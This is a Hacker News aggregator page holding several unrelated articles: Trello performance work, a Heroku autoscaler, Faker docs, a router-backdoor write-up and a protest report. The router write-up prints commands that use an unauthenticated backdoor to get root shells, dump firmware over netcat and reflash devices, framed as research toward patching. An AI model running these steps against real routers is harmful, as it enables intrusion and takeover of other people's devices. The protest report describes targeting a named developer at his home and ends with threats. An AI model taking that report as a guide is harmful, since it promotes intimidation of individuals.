Quantcast
Channel: Hacker News 50
Viewing all 9433 articles
Browse latest View live

We spent a week making Trello boards load extremely fast. Here’s how we did it. - Fog Creek Blog

$
0
0

Comments:" We spent a week making Trello boards load extremely fast. Here’s how we did it. - Fog Creek Blog "

URL:http://blog.fogcreek.com/we-spent-a-week-making-trello-boards-load-extremely-fast-heres-how-we-did-it/


We made a promise with Trello: you can see your entire project in a single glance. That means we can show you all of your cards so you can easily see things like who is doing what, where a task is in the process, and so forth, just by scrolling.

You all make lots of cards. But when the site went to load all of your hundreds and thousands of cards at once, boards were loading pretty slow. Okay, not just pretty slow, painfully slow. If you had a thousand or so cards, it would take seven to eight seconds to completely render. In that time, the browser was totally locked up. You couldn’t click anything. You couldn’t scroll. You just had to sit there.

With the big redesign, one of our goals was to make switching boards really easy. We like to think that we achieved that goal. But when the browser locked up every time you switched boards, it was an awfully slow experience. Who cared if the experience was easy? We had to make it fast.

So I set out on a mission: using a 906 card board on a 1400×1000 pixel window, I wanted to improve board rendering performance by 10% every day for a week. It was bold. It was crazy. Somebody might have said it was impossible. But I proved that theoretical person wrong. We more than achieved that goal. We got perceived rendering time for our big board down to one second.

Naturally, I kept track of my daily progress and implementation details in Trello. Here’s the log.

Monday (7.2 seconds down to 6.7 seconds. 7% reduction.)

Heavy styles like borders, shadows, and gradients can really slow down a browser. So the first thing we tried was removing things like borders on avatars, card borders, backgrounds and borders on card badges, shadows on lists, and the like. It made a big impact, especially for scrolling. We didn’t set out for a flat design. Our primary objective was to make things faster, but the result was a cleaner, simpler look.

Tuesday (6.7 seconds down to 5.9 seconds. 12% reduction.)

On the client, we use backbone.js to structure our app. With backbone, it’s really convenient to use views. Really, very convenient. For every card, we gave each member its own view. When you clicked on a member on a card, it came up with a mini-profile and a menu with an option to remove them from the card. All those extra views generated a lot of useless crap for the browser and used up a bunch of time.

So instead of using views for members, we now just render the avatars and use a generic click handler that looks for a data-idmem attribute on the element. That’s used to look up the member model to generate the menu view, but only when it’s needed. That made a difference.

I also gutted more CSS.

Wednesday (5.9 seconds… to 5.9 seconds. 0% reduction.)

I tried using the browser’s native innerHtml and getElementByClassName API methods instead of jQuery’s html and append. I thought native APIs might be easier for the browser to optimize and what I read confirmed that. But for whatever reason, it didn’t make much of a difference for Trello.

The rest of the day was a waste. I didn’t make much progress.

Thursday (5.9 seconds down to 960ms)

Thursday was a breakthrough. I tried two major things: preventing layout thrashing and progressive rendering. They both made a huge difference.

Preventing layout thrashing

First, layout thrashing. The browser does two major things when rendering HTML: layouts, which are calculations to determine the dimensions and position of the element, and paints, which make the pixels show up in the right spot with the correct color. Basically. We cut out some of the paints when we removed the heavy styles. There were fewer borders, backgrounds, and other pixels that the browser had to deal with. But we still had an issue with layouts.

Rendering a single card used to work like this. The card basics like the white card frame and card name were inserted into the DOM. Then we inserted the labels, then the members, then the badges, and so on. We did it this way because of another Trello promise: real-time updates. We needed a way to atomically render a section of a card when something changed. For example, when a member was added it triggered the cardView.renderMembers method so that it only rendered the members and didn’t need to re-render the whole card and cause an annoying flash.

Instead of building all the HTML upfront, inserting it into the DOM and triggering a layout just once; we built some HTML, inserted it into the DOM, triggered a layout, built more HTML, inserted it into the DOM, triggered a layout, built more HTML, and so on. Multiple insertions for each card. Times a thousand. That’s a lot of layouts. Now we render those sections before inserting the card into the DOM, which prevents a bunch of layouts and speeds things up.

In the old way, the card view render function looked something like this…

render: ->
 data = model.toJSON()
 @$.innerHTML = templates.fill(
 'card_in_list',
 data
 ) # add stuff to the DOM, layout
 @renderMembers() # add more stuff to the DOM, layout
 @renderLabels() # add even more stuff to the DOM, layout
 @

With the change, the render function looks something like this…

render: ->
 data = model.toJSON()
 data.memberData = []
 for member in members
 memberData.push member.toJSON()
 data.labelData = []
 for labels in labels when label.isActive
 labelData.push label
 partials = 
 "member": templates.member
 "label": templates.label
 @$.innerHTML = templates.fill(
 'card_in_list',
 data,
 partials
 ) # only add stuff to the DOM once, only one layout
 @

We had more layout problems, though. In the past, the width of the list would adjust to your screen size. So if you had three lists, it would try to fill up as much as the screen as possible. It was a subtle effect. The problem was that when the adjustment happened, the layout of every list and every card would need to be changed, causing major layout thrashing. And it triggered often: when you toggled the sidebar, added a list, resized the window, or whatnot. We tried having lists be a fixed width so we didn’t have to do all the calculations and layouts. It worked well so we kept it. You don’t get the adjustments, but it was a trade-off we were willing to make.

Progressive rendering

Even with all the progress, the browser was still locking up for five seconds. That was unacceptable, even though I technically reached my goal. According to Chrome DevTools’ Timeline, most of the time was being spent in scripts. Trello developer Brett Kiefer had fixed a previous UI lockup by deferring the initialization of jQuery UI droppables until after the board had been painted using the queue method in the async library. In that case, “click … long task … paint” became ”click … paint … long task“.

I wondered if a similar technique could be used for rendering cards progressively. Instead of spending all of the browser’s time generating one huge amount of DOM to insert, we could generate a small amount of DOM, insert it, generate another small amount, insert it, and so forth, so that the browser could free up the UI thread, paint something quickly, and prevent locking up. This really did the trick. Perceived rendering went down to 960ms on my 1,000 card board.

That looks something like this…

Here’s how the code works. Cards in a list are contained in a backbone collection. That collection has its own view. The card collection view render method with the queueing technique looks like this, roughly…

render: ->
 renderQueue = new async.queue (models, next) =>
 @appendSubviews(@subview(CardView, model) for model in models)
 # _.defer, a.k.a. setTimeout(fn, 0), will yield the UI thread 
 # so the browser can paint.
 _.defer next
 , 1
 chunkSize = 30
 models = @getModels()
 modelChunks = []
 while models.length > 0
 modelChunks.push(models.splice(0, chunkSize))
 for models in modelChunks
 # async.queue flattens arrays so lets wrap this array 
 # so it’s an array on the other end...
 renderQueue.push [models]
 @

We could probably just do a for loop with a setTimeout 0 and get the same effect since we know the size of the array. But it worked, so I was happy. There is still some slowness as the cards finish rendering on really big boards, but compared to total browser lock-up, we’ll accept that trade-off.

Trello developer Daniel LeCheminant chipped in by queueing event delegation on cards. Every card has a certain number of events for clicking, dragging, and so forth. It’s more stuff we can put off until later.

We also used the translateZ: 0 hack for a bit of gain. With covers, stickers, and member avatars, cards can have a lot of images. In your CSS, if you apply translateZ: 0 to the image element, you trick the browser into using the GPU to paint it. That frees up the CPU to do one of the many other things it needs to do. This browser behavior could change any day which makes it a hack, but hey, it worked.

Friday

I made a lot of bugs that week, so I fixed them on Friday.

That was the whole week. If rendering on your web client is slow, look for excessive paints and layouts. I highly recommend using Chrome DevTool’s Timeline to help you find trouble areas. If you’re in a situation where you need to render a lot of things at once, look into async.queue or some other progressive rendering.

Now that we have starred boards and fast board switching and rendering, it’s easier than ever to using multiple boards for your project. We wrote “Using Multiple Boards for a Super-Flexible Workflow” on the Trello blog to show you how to do it. On the UserVoice blog, there’s a great article about how they structure their workflow into different boards. Check those out.

If you’ve got questions, I’ll try and answer them on Twitter. Go try out the the latest updates on trello.com. It’s faster, easier, and more beautiful than ever.


Google Video Quality Report

instantga.me

TCP backdoor 32764 or how we could patch the Internet (or part of it ;))

$
0
0

Comments:"TCP backdoor 32764 or how we could patch the Internet (or part of it ;))"

URL:http://blog.quarkslab.com/tcp-backdoor-32764-or-how-we-could-patch-the-internet-or-part-of-it.html


Eloi Vanderbéken recently found a backdoor on some common routers, which is described on its GitHub here. Basically, a process that listens on the 32764 TCP port runs, sometimes accessible from the WAN interface. We scanned the v4 Internet to look for the routers that have this backdoor wild open, and gathered some statistics about them. We will also present a way to permanently remove this backdoor on Linksys WAG200N routers.

Note that despite this backdoor allows a free access to many hosts on the Internet, no patch is available as it is not maintained anymore. So we thought about some tricks combined with our tools to imagine how to fix that worldwide.

This backdoor doesn't have any kind of authentication and allows various remote commands, like:

  • remote root shell
  • NVRAM configuration dump: Wifi and/or PPPoE credentials can be extracted for instance
  • file copy

Let's see how many routers are still exposed to this vulnerability, and propose a way to remove this backdoor.

Looking for the backdoor on the Internet

We first used masscan to look for hosts with TCP port 32764 open. We ended up with about 1 million IPv4s . The scan took about 50 hours on a low-end Linux virtual server.

Then, we had to determine whether this was really the backdoor exposed, or some other false positive.

Eloi's POC shows a clear way to do this:

  • Send a packet to the host device
  • Wait for an answer with 0x53634D4D (or 0x4D4D6353, according to the endianness of the device, see below)
  • In such a case, the backdoor is here and accessible.

In order to check the IPs previously discovered, we couldn't use masscan or a similar tool (as they don't have any "plugin" feature). Moreover, sequentially establishing a connection to each IP to verify that the backdoor is present would take ages. For instance, with a 1 second timeout, the worst case scenario is 1 million seconds (about 12 days) and even if half the hosts would answer "directly", it would still run for 6 days. Quick process-based parallelism could help and might divide this time by 10/20. It still remains a lot and is not the good way to do this.

We thus decided to quickly code a scanner based on asynchronous sockets, that will check the availability of the backdoor. The advantage of asynchronous sockets are that lots of them (about 30k in our tests) can be managed at the same time, thus managing 30k hosts in parallel. This kind of parallelism couldn't be achieved with a classical process (or thread)-based parallelism.

This asynchronous model is somehow the same used by masscan and zmap, apart that they bypass sockets to directly emit packets (and thus manage more hosts simultaneously).

Using a classical Linux system, a first implementation using the select function and a five seconds timeout would perform at best ~1000 tests/second. The limitation is mainly due to the fact that the FD_SETSIZE value, on most Linux systems, is set by default to 1024. This means that the maximum file descriptor identifier that select can handle is 1024 (and thus the number of descriptors is inferior or equal to this limit). In the end, this limits the number of sockets that can be opened at the same time, thus the overall scan performance.

Fortunately, other models that do not have this limitation exist. epoll is one of them. After adapting our code, our system was able to test about 6k IP/s (using 30k sockets simultaneously). That is less than what masscan and/or zmap can do (in terms of packets/s), but it gave good enough performance for what we needed to do.

In the end, we found about 6500 routers running this backdoor.

Sources for these scanners are not ready to be published yet (trust me), but stay tuned :)

Note about big vs. little endian

The people that coded this backdoor didn't care about the endianness of the underlying CPU. That's why the signature that is received can have two different values.

To exploit the backdoor, one has to first determine the endianness of the remote router. This is done by checking the received signature: 0x53634D4D means little-endian, 0x4D4D6353 big-endian.

The nerve of a good patch: information

As we are looking to provide a patch for the firmware, we needed to look at what was around, which hardware, where it is, and so on.

Hardware devices

We tried to identify the different hardware devices. It is not obvious at first, and there are several ways to do this by hand:

  • Look for this information in the web interface;
  • Parse the various configuration scripts;
  • grep for "netgear", "linksys" and other manufacturers;
  • Look for files with a specific names (like WAG160N.ico)

It is a bit hard to automate that process. Fortunately for us, a "version" field can be obtained from the backdoor. This field seems to be consistent across the same hardware. Unfortunately, the mapping between this field version and the real hardware still has to be done by hand. This process is not perfect but we haven't seen so far two different hardwares with the same "version" field.

Moreover, Cisco WAP4410 access points don't support this query but can be identified through the "sys_desc" variable (in its internal configuration).

The final repartition of hardware models is the following:

As you can see, there is still work to do in order to identify all the different hardwares.

Country statistics

Another interesting statistics is the repartition by country of the backdoored routers (based on Maxmind public GeoIP database):

The unlucky ones are the United States, followed by the Netherlands, with China very close.

Reconstructing a new filesystem

In order to provide a new clean filesystem, we needed to dump one from a router. So, we firstly used the backdoor to retrieve such a filesystem. Moreover, analyzing it makes it easier to understand how the router works and is configured.

We made our experiments on our Linksys WAG200N. These techniques might or might not work on others. On this particular router (and maybe others), a telnet daemon executable is available (/usr/sbin/utelnetd). It can be launched through the backdoor and directly drops a root shell.

The backdoor allows us to execute command as a root user and to copy some files. Unfortunately, on many routers, there is no SSH daemon that can be started or even a netcat utility for easy and quick transfers. Moreover, the only partition that is writable is generally a RAMFS mounted on /tmp.

So let's see what are our options here.

Option 1 : download through the web server

Lots of routers have a web server that is used for their configuration. This web server (as every process running on the router) is running as the root user. This is potentially a good way to download files (and the rootfs) from the router.

For instance, on the Linksys WAG200N (and others), /www/ppp_log is a symbolic link to /tmp/ppp_log (for the web servers to show the PPP log). Thus, the root FS can be download like this:

  • Get a root shell thanks to the backdoor
# cd /tmp
# mkdir ppp_log
# cd ppp_log && cat /dev/mtdblock/0 >./rootfs
  • When it's done, on your computer: wget http://IP/ppp_log/rootfs

The MTD partition to use can be identified thanks to various methods. /proc/mtd is a first try. In our case:

# cat /proc/mtd
dev: size erasesize name
mtd0: 002d0000 00010000 "mtd0"
mtd1: 000b0000 00010000 "mtd1"
mtd2: 00020000 00010000 "mtd2"
mtd3: 00010000 00010000 "mtd3"
mtd4: 00010000 00010000 "mtd4"
mtd5: 00040000 00010000 "mtd5"

The name does not give a lot of information. But, from the size of the partitions, we can guess that mtd0 is the rootfs (~2.8Mb). Moreover, a symlink in /dev validate this assumption:

# ls -la /dev
[...] root -> mtdblock/0

Option 2 : MIPS cross compilation, netcat and upload

Another way to dump the rootfs is to cross compile a tool like netcat for the targeted architecture. Remember, we have little and big endian MIPS systems. Thus, we potentially need a cross compilation chain for these two systems.

By analyzing some binaries on our test router, it appears that the uClibc library and tool chains have been used by the manufacturer, with versions from 2005. Thus, we downloaded one of the version of uClibc that was released this year. After some difficulties to find the old versions of binutils, gcc (and others) and getting a working GCC 3.x compiler, our MIPSLE cross compiler was ready.

Then, we grabbed the netcat sources and compiled them. There are multiple ways that can be used to upload our freshly compiled binary to the router. The first one is to use the write "feature" of the backdoor:

$ ./poc.py --ip IP --send_file ./nc --remote-filename nc

This has been implemented in Eloi's POC here: https://raw.github.com/elvanderb/TCP-32764/master/poc.py .

The issue with this feature is that it seems to crash with "big" files.

Another technique is to use echo -n -e to transfer our binary. It works but is a bit slow. Also, the connection is sometimes closed by the router, so we have to restart where it stopped. Just do:

$ ./poc.py --ip IP --send_file2 ./nc --remote-filename nc

The MIPSEL netcat binary can be downloaded here: https://github.com/quarkslab/linksys-wag200N/blob/master/binaries/nc?raw=true.

Once netcat has been uploaded, simply launch on the router:

# cat /dev/mtdblock/0 |nc -n -v -l -p 4444

And, on your computer:

$ nc -n -v IP 4444 >./rootfs.img

Patch me if you can (yes we can)

Please note that everything that is described here is experimental and should be done only if you exactly know what you are doing. We can't be held responsible for any damage you will do to your beloved routers!

Note: the tools mentioned here are available on GitHub:https://github.com/quarkslab/linksys-wag200N.

Now that we have the original squashfs image, we can extract it. It is a well-known SquashFS, so let's grab the latest version (4.0 at the time of writing this article) and "unsquash" it:

$ unsquashfs original.img
Parallel unsquashfs: Using 8 processors
gzip uncompress failed with error code -3
read_block: failed to read block @0x1c139c
read_fragment_table: failed to read fragment table block
FATAL ERROR:failed to read fragment table
$ unsquashfs -s original.img
Found a valid little endian SQUASHFS 2:0 superblock on ./original.img
[...]
Block size 32768

This is the same issue that Eloi pointed out in its slides. What he shows is that he had to force LZMA to be used for the extraction. With the fixes he provided (exercise also left to the reader), we can extract the SquashFS:

# unsquashfs-lzma original.img
290 inodes (449 blocks) to write
created 189 files
created 28 directories
created 69 symlinks
created 32 devices
created 0 fifos

What actually happened is that, back in 2005, the developer of this firmware modified the SquashFS 2.0 tools to use LZMA (and not gzip). Even if Eloi's "chainsaw" solution worked for extraction, it will not allow us to make a new image with the 2.0 format. So, back with the chainsaw, grab the squashfs 2.2 release from sourceforge, the LZMA 4.65 SDK, and make squashfs use it with this patch:https://github.com/quarkslab/linksys-wag200N/blob/master/src/squashfs-lzma.patch. The final sources can be downloaded here:https://github.com/quarkslab/linksys-wag200N/tree/master/src/squashfs2.2-r2-lzma.

With our new and freshly compiled SquashFS LZMA-enhanced 2.2 version back from the dead, we can now reconstruct the Linksys rootfs image. It is important to respect the endianness and the block size of the original image (or your router won't boot anymore).

$ ./squashfs2.2-r2-lzma/squashfs-tools/mksquashfs rootfs/ rootfs.img -2.0 -b 32768
Creating little endian 2.0 filesystem on modified-bis.img, block size 32768.
Little endian filesystem, data block size 32768, compressed data, compressed metadata, compressed fragments
[...]
$ unsquashfs -s rootfs.img
Found a valid little endian SQUASHFS 2:0 superblock on rootfs.img.
Creation or last append time Wed Jan 22 10:38:29 2014
Filesystem size 1829.09 Kbytes (1.79 Mbytes)
Block size 32768
[...]

Now, let's begin with the nice part. To test that our image works, we'll upload and flash it to the router. This step is critical, because if it fails, you'll end up with a router trying to boot from a corrupted root filesystem.

First, we use our previously compiled netcat binary to upload the newly created image (or use any other method of your choice):

On the router side: .. code:

# nc -n -v -l -p 4444 >/tmp/rootfs.img

On the computer side: .. code:

$ cat rootfs.img |nc -n -v IP 4444

When it's finished, have a little prayer and, on the router side: .. code:

# cat /tmp/rootfs.img >/dev/mtdblock/0

Then, plug off and on your router! If everything went well, your router should have rebooted just like before. If not, then you need to reflash your router another way, using the serial console or any JTAG port available (this is not covered here).

Now, we can simply permanently remove the backdoor from the root filesystem:

# cd /path/to/original/fs
# rm usr/sbin/scfgmgr
# Edit usr/etc/rcS and remove the following line
/usr/sbin/scfgmgr

Then, rebuild your image as above, upload it, flash your router and the backdoor should be gone forever! It's up to you to build an SSH daemon to keep a root access on your router if you still want to play with it.

Linksys WAG200N patch procedure

For those who would just like to patch their routers, here are the steps. Please note that this has only been tested on our Linksys WAG200N! It is really not recommanded to use it with other hardware. And, we repeat it, we cannot be held responsible for any harm on your routers! Use this at your own risk.

$ ./poc.py --ip IP --send_file2 nobackdoor.img --remote-filename rootfs
  • Then get a root shell on your router:
$ ./poc.py --ip IP --shell
  • Check that the file sizes are the same:
# ls -l /tmp/rootfs
# it should be 1875968 bytes
  • To be sure, just redownload the uploaded image thanks to the web server and check that they are the same:
# mkdir /tmp/ppp_log
# ln -s /tmp/rootfs /tmp/ppp_log
And, on your computer:
$ wget http://IP/ppp_log/rootfs
$ diff ./rootfs /path/to/linksysWAG200N.nobackdoor.rootfs
# cat /tmp/rootfs >/dev/mtdblock/0

Conclusion

This article showed some statistics about the presence of the backdoor found by Eloi Vanderbéken and how to fix one of the hardware affected. Feel free to comment any mistakes here, and/or provide similar images and/or fixes for other routers :)

Acknowledge

  • Eloi Vanderbéken for his discovery and original POC
  • Fred Raynal, Fernand Lone-Sang, @pod2g, Serge Guelton and Kévin Szkudlaspki for their corrections

support SQLite for functional testing purposes by bendavies · Pull Request #12 · fre5h/DoctrineEnumBundle · GitHub

Dynosaur: A Heroku Autoscaler - Harry's Engineering

$
0
0

Comments:" Dynosaur: A Heroku Autoscaler - Harry's Engineering"

URL:http://engineering.harrys.com/2014/01/02/dynosaur-a-heroku-autoscaler.html


We are excited to announce the first release of Dynosaur, our Heroku autoscaler that uses the Google Analytics Live API to dynamically provision Heroku dynos based on the number of current users on the site.

The main autoscaler engine lives in its own gem and can be run on the command line with a config file (e.g. as a Heroku worker process!) but we also wrote a simple web interface for it. Dynosaur-rails can be trivially deployed as a Heroku app, and it allows you to manually tweak the minimum number of dynos at runtime, in case your autoscaler estimates are off.

How it works

Dynosaur uses one or more plugins to determine the estimated number of dynos required, then hits the Heroku API to set the correct value. We err on the side of conservative and wait some fixed amount of time after any change before reducing the number of dynos.

The first (and only!) plugin uses the Google Analytics Live API (currently in private beta) and a configurable ‘users per dyno’ value to estimate the required number of dynos.

This chart shows how the Analytics plugin estimated our required dynos during a test. The blue line is the number of active users on the site. The orange line is the number of dynos required (configured to 10 users per dyno for this test).

For the same time period, we can see that the combined estimated number of dynos (green line) follows the Analytics plugin, except it has a minimum of 1 dyno and never drops to zero. The actual selected number of dynos (blue line) follows the estimate as it climbs, but as it descends it goes slower, since we have the blackout interval set at 5 minutes.

The Web Interface

We made a little Rails app to make it easier to deploy, monitor and configure Dynosaur. It has very few features:

  • Modify parameters such as minimum dynos at runtime
  • View the current values (current dynos, what each plugin is estimating, current plugin results etc)
  • Configure plugins (it automatically detects parameters that can be configured)
  • Runs the Dynosaur code within the Rails app, so easy to deploy on Heroku.

Mmmm, Bootstrap! Have some screenshots:

Status View

Configure Main App

Configure Google Analytics Plugin

Securing the Web Interface

We restrict access to Dynosaur-rails with http basic auth (configured via Heroku environment variables) and an IP whitelist (also configured through environment variables).

Pluggable

Number of active users suits our usage well, but one could equally use app response time from NewRelic or some other core metric for your app to decide how to scale. See the README for more info on extending Dynosaur with new plugins.

When multiple plugins are enabled, Dynosaur will combine them by taking the maximum value, thus each plugin really defines a floor for the number of dynos.

Stats

Dynosaur can optionally use Librato to collect some statistics on its operation. We track the estimated dynos (based on combined estimates from all plugins), and the value we have actually chosen (including delay before downsizing and min/max dyno settings). Also, for each plugin configured we track the value (e.g. ‘current users on site’) and the estimate of dynos required by that plugin. To enable statistics, just create a free Librato account and configure Dynosaur with the account email address and API key.

Awesomeness

Dynosaur is letting us skip that whole rigmarole of wake-up-at-6am-because-we-were-featured-in-the-NYT-and-traffic-is-through-the-roof. More sleep equals happy developers, and this new API from Google is proving very useful to us from an operations perspective. We want you to be happy too, so please use it, write new plugins, fix bugs and open pull requests!

Demonstration at Home of Google Developer. Google Bus Blocked in Berkeley. : Indybay

$
0
0

Comments:"Demonstration at Home of Google Developer. Google Bus Blocked in Berkeley. : Indybay"

URL:https://www.indybay.org/newsitems/2014/01/21/18749504.php


At 7am this morning, a group of people went to the home of Anthony Levandowski, a Google X developer. His house is a pompous, minimally decorated two story palace with stone lions guarding the door. After ringing his doorbell to alert him of the protest, a banner was held in front of his house that read "Google's Future Stops Here" and fliers about him were distributed around the neighborhood. The fliers detailed his work with the defense industry and his plans to develop luxury condos in Berkeley. The flier is attached below.

At one point, his neighbor emerged from her house. She said she knew about his collaboration with the military but insisted he was a "nice person." We see no contradiction here. It is very likely that this person, who develops war robots for the military and builds surveillance infrastructure, is a pleasant neighbor. But so what?

After previous actions against the Google buses, many critics insisted that the individual Google employees are not to blame. Taking this deeply to heart, we chose to block Anthony Levandowski's personal commute. We also respectfully disagree with this criticism: We don't see one action as better than the other. All of Google's employees should be prevented from getting to work. All surveillance infrastructure should be destroyed. No luxury condos should be built. No one should be displaced.

After fliering his neighborhood and blocking his driveway for approximately 45 minutes, the group went down and blocked a google bus at Ashby BART. This blockade lasted about 30 minutes and dispersed when BPD arrived. Several conversations took place with Google employees.

Luckily, the defections have already begun. Yesterday, an actually-nice person employed by Google leaked the talking points the company sent to its employees should they attend an upcoming SF City Council meeting or in the event of a bus disruption. These talking points paint Google employees as positive contributors to the neighborhoods they live in. It makes no mention to the displacement they cause, the police presence they bring with them and the large class of people working to support their out-of-touch and extravagant lifestyles: the tech support.

We will not be held hostage by Google's threat to release massive amounts of carbon should the bus service be stopped. Our problem is with Google, its pervasive surveillance capabilities utilized by the NSA, the technologies it is developing, and the gentrification its employees are causing in every city they inhabit. But our problem does not stop with Google. All of you other tech companies, all of you other developers and everyone else building the new surveillance state--We're coming for you next.

VMware Buys AirWatch for $1.54 Billion


Faker by joke2k

$
0
0

Comments:"Faker by joke2k"

URL:http://www.joke2k.net/faker/


_|_|_|_| _|
_| _|_|_| _| _| _|_| _| _|_|
_|_|_| _| _| _|_| _|_|_|_| _|_|
_| _| _| _| _| _| _|
_| _|_|_| _| _| _|_|_| _|

Faker

Faker is a Python package that generates fake data for you. Whether you need to bootstrap your database, create good-looking XML documents, fill-in your persistence to stress test it, or anonymize data taken from a production service, Faker is for you.

Faker is heavily inspired by PHP's Faker, Perl's Data::Faker, and by ruby's Faker.

Basic Usage

Install with pip:

pip install fake-factory

Use faker.Factory.create() to create and initialize a faker generator, which can generate data by accessing properties named after the type of data you want.

fromfakerimportFactoryfaker=Factory.create()faker.name()# 'Lucy Cechtelar'faker.address()# "426 Jordy Lodge# Cartwrightshire, SC 88120-6700"faker.text()# Sint velit eveniet. Rerum atque repellat voluptatem quia rerum. Numquam excepturi# beatae sint laudantium consequatur. Magni occaecati itaque sint et sit tempore. Nesciunt# amet quidem. Iusto deleniti cum autem ad quia aperiam.# A consectetur quos aliquam. In iste aliquid et aut similique suscipit. Consequatur qui# quaerat iste minus hic expedita. Consequuntur error magni et laboriosam. Aut aspernatur# voluptatem sit aliquam. Dolores voluptatum est.# Aut molestias et maxime. Fugit autem facilis quos vero. Eius quibusdam possimus est.# Ea quaerat et quisquam. Deleniti sunt quam. Adipisci consequatur id in occaecati.# Et sint et. Ut ducimus quod nemo ab voluptatum.

Each call to method faker.name() yealds a different (random) result. This is because faker uses __getattr__ magic, and forwards faker.Genarator.method_name()' calls tofaker.Generator.format(method_name)`.

foriinrange(0,10):printfaker.name()# Adaline Reichel# Dr. Santa Prosacco DVM# Noemy Vandervort V# Lexi O'Conner# Gracie Weber# Roscoe Johns# Emmett Lebsack# Keegan Thiel# Wellington Koelpin II# Ms. Karley Kiehn V

Formatters

Each of the generator properties (like name, address, and lorem) are called "formatters". A faker generator has many of them, packaged in "providers". Here is a list of the bundled formatters in the default locale.

faker.providers.File:

fake.mimeType() # video/webm

faker.providers.UserAgent:

fake.chrome() # Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_8_4) AppleWebKit/5341 (KHTML, like Gecko) Chrome/13.0.803.0 Safari/5341
fake.firefox() # Mozilla/5.0 (Windows 95; sl-SI; rv:1.9.1.20) Gecko/2012-01-06 22:35:05 Firefox/3.8
fake.internetExplorer() # Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.1)
fake.linuxPlatformToken() # X11; Linux x86_64
fake.linuxProcessor() # x86_64
fake.macPlatformToken() # Macintosh; U; PPC Mac OS X 10_7_6
fake.macProcessor() # U; PPC
fake.opera() # Opera/9.41 (Windows CE; it-IT) Presto/2.9.168 Version/12.00
fake.safari() # Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/534.34.4 (KHTML, like Gecko) Version/5.0 Safari/534.34.4
fake.userAgent() # Mozilla/5.0 (iPod; U; CPU iPhone OS 3_2 like Mac OS X; en-US) AppleWebKit/531.15.3 (KHTML, like Gecko) Version/4.0.5 Mobile/8B119 Safari/6531.15.3
fake.windowsPlatformToken() # Windows 98; Win 9x 4.90

faker.providers.PhoneNumber:

fake.phoneNumber() # (593)652-1880

faker.providers.Miscelleneous:

fake.boolean() # True
fake.countryCode() # BB
fake.languageCode() # fr
fake.locale() # pt_GN
fake.md5() # ab9d3552b5c6e68714c04c35725ba73c
fake.nullBoolean() # True
fake.sha1() # 3fc2ede28f2596050f9a94c15c59b800175409d0
fake.sha256() # f06561a971d6b1306ecef60be336556d6de2540c2d0d2158f4d0ea3f212cd740

faker.providers.Internet:

fake.companyEmail() # ggreenfelder@ortizmedhurst.com
fake.domainName() # mayer.com
fake.domainWord() # gusikowski
fake.email() # gbrakus@johns.net
fake.freeEmail() # abbey60@yahoo.com
fake.freeEmailDomain() # hotmail.com
fake.ipv4() # 81.132.249.71
fake.ipv6() # 4c55:8c8b:54b5:746d:44ed:c7ab:486a:a50e
fake.safeEmail() # amalia49@example.com
fake.slug() # TypeError
fake.tld() # net
fake.uri() # http://www.parker.com/
fake.uriExtension() # .asp
fake.uriPage() # terms
fake.uriPath() # explore/list/app
fake.url() # http://dubuque.info/
fake.userName() # goodwin.edwin

faker.providers.Company:

fake.bs() # maximize end-to-end infrastructures
fake.catchPhrase() # Multi-tiered analyzing instructionset
fake.company() # Stanton-Luettgen
fake.companySuffix() # Group

faker.providers.DateTime:

fake.amPm() # AM
fake.century() # IX
fake.date() # 1985-02-17
fake.dateTime() # 1995-06-08 14:46:50
fake.dateTimeAD() # 1927-12-17 23:08:46
fake.dateTimeBetween() # 1999-08-22 22:49:52
fake.dateTimeThisCentury() # 1999-07-24 23:35:49
fake.dateTimeThisDecade() # 2008-01-27 01:08:37
fake.dateTimeThisMonth() # 2012-11-12 14:13:04
fake.dateTimeThisYear() # 2012-05-19 00:40:00
fake.dayOfMonth() # 23
fake.dayOfWeek() # Friday
fake.iso8601() # 2009-04-09T21:30:02
fake.month() # 03
fake.monthName() # April
fake.time() # 06:16:50
fake.timezone() # America/Noronha
fake.unixTime() # 275630166
fake.year() # 2002

faker.providers.Person:

fake.firstName() # Elton
fake.lastName() # Schowalter
fake.name() # Susan Pagac III
fake.prefix() # Ms.
fake.suffix() # V

faker.providers.Address:

fake.address() # 044 Watsica Brooks
 West Cedrickfort, SC 35023-5157
fake.buildingNumber() # 319
fake.city() # Kovacekfort
fake.cityPrefix() # New
fake.citySuffix() # ville
fake.country() # Monaco
fake.geo_coordinate() # 148.031951
fake.latitude() # 154.248666
fake.longitude() # 109.920335
fake.postcode() # 82402-3206
fake.secondaryAddress() # Apt. 230
fake.state() # Nevada
fake.stateAbbr() # NC
fake.streetAddress() # 793 Haskell Stravenue
fake.streetName() # Arvilla Valley
fake.streetSuffix() # Crescent

faker.providers.Lorem:

fake.paragraph() # Itaque quia harum est autem inventore quisquam eaque. Facere mollitia repudiandae
 qui et voluptas. Consequatur sunt ullam blanditiis aliquam veniam illum voluptatem.
fake.paragraphs() # ['Alias porro soluta eum voluptate. Iste consequatur qui non nam.',
 'Id eum sint eius earum veniam fugiat ipsum et. Et et occaecati at labore
 amet et. Rem velit inventore consequatur facilis. Eum consequatur consequatur
 quis nobis.', 'Harum autem autem totam ex rerum adipisci magnam adipisci.
 Qui modi eos eum vel quisquam. Tempora quas eos dolorum sint voluptatem
 tenetur cum. Recusandae ducimus deleniti magnam ullam adipisci ipsa.']
fake.sentence() # Eum magni soluta unde minus nobis.
fake.sentences() # ['Ipsam eius aut veritatis iusto.',
 'Occaecati libero a aut debitis sunt quas deserunt aut.',
 'Culpa dolor voluptatum laborum at et enim.']
fake.text() # Dicta quo eius possimus quae eveniet cum nihil. Saepe sint non nostrum.
 Sequi est sit voluptate et eos eum et. Pariatur non sunt distinctio magnam.
fake.word() # voluptas
fake.words() # ['optio', 'et', 'voluptatem']

Localization

faker.Factory can take a locale as an argument, to return localized data. If no localized provider is found, the factory fallbacks to the default locale (en_EN).

from faker import Factory
fake = Factory.create('it_IT')
for i in range(0,10):
 print fake.name()
# Elda Palumbo
# Pacifico Giordano
# Sig. Avide Guerra
# Yago Amato
# Eustachio Messina
# Dott. Violante Lombardo
# Sig. Alighieri Monti
# Costanzo Costa
# Nazzareno Barbieri
# Max Coppola

You can check available Faker locales in the source code, under the providers package. The localization of Faker is an ongoing process, for which we need your help. Don't hesitate to create localized providers to your own locale and submit a PR!

Using from shell

In a python environment with faker installed you can use it with:

python -m faker [option] [*args]

[option]:

  • formatter name as text, address: display result of fake
  • Provider name as Lorem: display all Provider's fakes

[*args]: pass value to formatter (actually only strings)

